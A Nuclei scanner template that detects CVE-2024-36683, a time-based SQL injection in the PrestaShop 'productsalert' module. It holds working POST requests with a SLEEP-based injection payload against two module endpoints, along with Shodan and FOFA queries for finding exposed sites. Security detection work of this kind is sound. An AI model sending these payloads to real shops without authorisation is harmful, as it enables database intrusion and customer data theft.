id: CVE-2024-36683 info: name: PrestaShop productsalert - SQL Injection author: mastercho severity: critical description: | In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions. remediation: | Apply the latest security patches and updates from the vendor to address this vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. reference: - https://security.friendsofpresta.org/modules/2024/06/20/productsalert.html - https://nvd.nist.gov/vuln/detail/CVE-2024-36683 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-36683 cwe-id: CWE-89 epss-score: 0.00963 epss-percentile: 0.60124 metadata: verified: true max-request: 2 framework: prestashop shodan-query: html:"/productsalert" fofa-query: body="/productsalert" tags: time-based-sqli,cve,cve2024,prestashop,sqli,productsalert,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(tolower(body), "productsalert", "prestashop")' condition: and internal: true - raw: - | @timeout: 30s POST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158 - | @timeout: 30s POST /module/productsalert/AjaxProcess HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(8)))IuFA) AND 'pAlk'='pAlk&pid=13158 stop-at-first-match: true host-redirects: true max-redirects: 3 matchers-condition: or matchers: - type: dsl name: time-based dsl: - 'duration_1>=8 && status_code_1 != 404' - 'duration_2>=8 && status_code_2 != 404' condition: or # digest: 4b0a00483046022100be0b33fd23698c6d060b4e28c1418f6d43e56627fb7faa2bf89af07449d70d55022100f3992fc54927093fd35dba540d828eb1b44f145a0c82691f0e756af9e75245c8:922c64590222798bb761d5b6d8e72950